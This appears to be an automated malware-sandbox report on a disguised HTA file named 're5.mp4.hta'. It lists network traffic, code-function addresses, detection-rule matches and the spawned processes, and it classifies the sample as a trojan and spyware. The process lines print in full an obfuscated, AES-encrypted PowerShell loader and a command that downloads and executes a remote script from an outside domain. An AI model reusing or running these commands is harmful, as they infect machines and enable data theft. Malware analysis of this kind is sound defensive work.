                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49983 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49984 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49986 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49987 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49988 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49989 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49990 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49991 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49992 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.5:49993 version: TLS 1.2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00433510 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_00433510
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00433510 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_00433510

                  System Summary

                  barindex
                  Source: Process Memory Space: powershell.exe PID: 4524, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 616, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07204CA8 NtResumeThread,4_2_07204CA8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07204CA0 NtResumeThread,4_2_07204CA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F757804_2_06F75780
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F7577B4_2_06F7577B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F790D84_2_06F790D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F790CF4_2_06F790CF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F790C84_2_06F790C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F751E84_2_06F751E8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F751C54_2_06F751C5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F898884_2_06F89888
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F886704_2_06F88670
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F886614_2_06F88661
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F824D84_2_06F824D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F885E04_2_06F885E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F875D84_2_06F875D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F875C84_2_06F875C8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F825184_2_06F82518
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F898794_2_06F89879
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F800404_2_06F80040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F800064_2_06F80006
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_071CBB0D4_2_071CBB0D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_071C24C04_2_071C24C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_071CEB624_2_071CEB62
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_071CEBA04_2_071CEBA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_071CD9D84_2_071CD9D8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_071CD9E84_2_071CD9E8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_072057204_2_07205720
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_072057304_2_07205730
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07205D904_2_07205D90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0722CF004_2_0722CF00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07228BC74_2_07228BC7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0722E4F84_2_0722E4F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0722D2274_2_0722D227
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_072200064_2_07220006
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_072200404_2_07220040
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07228C624_2_07228C62
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07229BE84_2_07229BE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07229BD84_2_07229BD8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040A8708_2_0040A870
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004228708_2_00422870
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004118D08_2_004118D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004388E08_2_004388E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004089A08_2_004089A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004379A28_2_004379A2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004262108_2_00426210
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043C2108_2_0043C210
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004104E78_2_004104E7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042C4F68_2_0042C4F6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00438C908_2_00438C90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040AD208_2_0040AD20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004085D08_2_004085D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040D6438_2_0040D643
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004416008_2_00441600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041A8008_2_0041A800
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F8008_2_0043F800
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004418008_2_00441800
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041D8108_2_0041D810
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004268378_2_00426837
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004058E08_2_004058E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041F0E68_2_0041F0E6
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004368AC8_2_004368AC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0040F8B08_2_0040F8B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F8B08_2_0043F8B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004061408_2_00406140
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004091408_2_00409140
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F9408_2_0043F940
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004039008_2_00403900
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042E9048_2_0042E904
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004271348_2_00427134
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004191D08_2_004191D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004381D08_2_004381D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004231E08_2_004231E0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043A1A98_2_0043A1A9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043CA408_2_0043CA40
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00417A518_2_00417A51
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00408A708_2_00408A70
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00440AC08_2_00440AC0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00425AC98_2_00425AC9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004402D08_2_004402D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004042B08_2_004042B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042235A8_2_0042235A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004393708_2_00439370
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004313208_2_00431320
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00436B248_2_00436B24
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00404BE08_2_00404BE0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004253E58_2_004253E5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004233FA8_2_004233FA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004223908_2_00422390
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004073B08_2_004073B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CBBB8_2_0042CBBB
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FC108_2_0043FC10
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00427C2A8_2_00427C2A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004384308_2_00438430
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041A4C08_2_0041A4C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00436CED8_2_00436CED
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00421C8F8_2_00421C8F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042C4908_2_0042C490
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00415CA08_2_00415CA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00437CB88_2_00437CB8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CD4B8_2_0042CD4B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042FD538_2_0042FD53
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004285728_2_00428572
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004215008_2_00421500
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0042CD0A8_2_0042CD0A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041D5208_2_0041D520
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00428D208_2_00428D20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F5C08_2_0043F5C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004065D08_2_004065D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00424DF08_2_00424DF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041CD808_2_0041CD80
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00405DA08_2_00405DA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004095A08_2_004095A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00413DA08_2_00413DA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00410E598_2_00410E59
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041BE608_2_0041BE60
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00414E0D8_2_00414E0D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00430E2C8_2_00430E2C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004146D08_2_004146D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F6D08_2_0043F6D0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004226DC8_2_004226DC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00402EE08_2_00402EE0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00408EF08_2_00408EF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004396F08_2_004396F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004406F08_2_004406F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004257408_2_00425740
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0041671A8_2_0041671A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043D71C8_2_0043D71C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00422F308_2_00422F30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043F5C08_2_0043F5C0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043EFF18_2_0043EFF1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00439FF08_2_00439FF0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00428D208_2_00428D20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0043FF908_2_0043FF90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004157B08_2_004157B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00413D90 appears 86 times
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00407F40 appears 45 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: Process Memory Space: powershell.exe PID: 4524, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 616, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@12/10@3/3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00438C90 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_00438C90
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnzqldrd.xn1.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\re5.mp4.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))}
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass MZP
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RofJg($zkfZU){return -split ($zkfZU -replace '..', '0x$& ')};$xHKo = RofJg('ADDABD852CBF669FB61EACB84993EA3F154802630095EC46064205C3E258CA0A3F846939344DFEADF3B7AC1A3089265AAEECAAD45D0357AA9B08B6C103541454A7CFA4167A71B0010AA6E212385CA641B99658282EE9B9F894A6F9BE882279D7E4F19BDCA0261AA79FC5FAD99FB022F746001AACC2A62050F3C5F1ACB5DBCECEECFE3A7A31A8937A5F65851F4C54937EAC4F795E298C9214224843FB4F9B13B0ABEA024CF9052242B65816163BD511BDD6A30B7FD935D931026CD618E7CF54E77A0A14C23FC0A2197A0626BCCD85128A5B13D7573F97FA06919B49E60B6F135A7B0087E73BEDF1BBD8EF749346E35BB5B8EF328AB42653A8C423CCE65ED751D8FDB7538347B1115C64B27CB0B663FD5D314EF76EA571A266B7DA4A5FEDC4A11881B74E43E450CB442B4DCF5E7F4D3F964B91DD28FD3C9CC2CA269708977893826BC4F817CA3F24A1E25FD45FEE31E6F57DD231764A7ED8EC4F27A85D3E63955F8A0D8233AF72C4E3B87AC790739B96882AAE6D9C087FDE0339006489DE3CCC111FF2BE081EFD92E3486DC8FA48F7C64E97265982A18F79B58A14B1B7F4E618D3E23C9A3C802554F05AB3FACFC592E6C0A13C4FCD3AC9EB67201312B305EABAA5BD1661FB4D01209CD8147427069DCB7C70B3FC1669E3D643A74B2F009A73FF4ECAF1E92FB68F73506E4E251F8603CB128405A12B13D51EB28D67D152254C24F1B1B1B208470E50C7C6A293ED2B9BC672E7167C873D379DDA70928E34D5D92B01E6FBEF93CFF4C5A2A47FEC851643D38DAC71CC97DE03EF89C84EC82B4DAEC32416113C18A4F97176E6C6F19529DFC27FEDF76EAECC83B65CDB18F573A47CA511ABB57C0E2FB271F43F876C7E4EBB670821DEE11F27961708ECC5A51060AB343764D0D66A8F570DE51685313E5643F216ABA89A781C9437C8360BDD168A4F24CC7EEDBAF8CB939B2CD236895145BEE8327E515C72C6E3F8945F6B99DD6856D6B85A39A9636EF180D230B26C5E84DE8C40A71AE0F1B4C4B3ABEE23B5B26FF40AC1D252C89C4C40A58E6456EBA4F5FBFC23');$Hubqy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((RofJg('446D676A575941436563554774726D56')),[byte[]]::new(16)).TransformFinalBlock($xHKo,0,$xHKo.Length)); & $Hubqy.Substring(0,3) $Hubqy.Substring(129)Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://t1.awagama2.org/Scheele.pt'))} Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass MZPJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
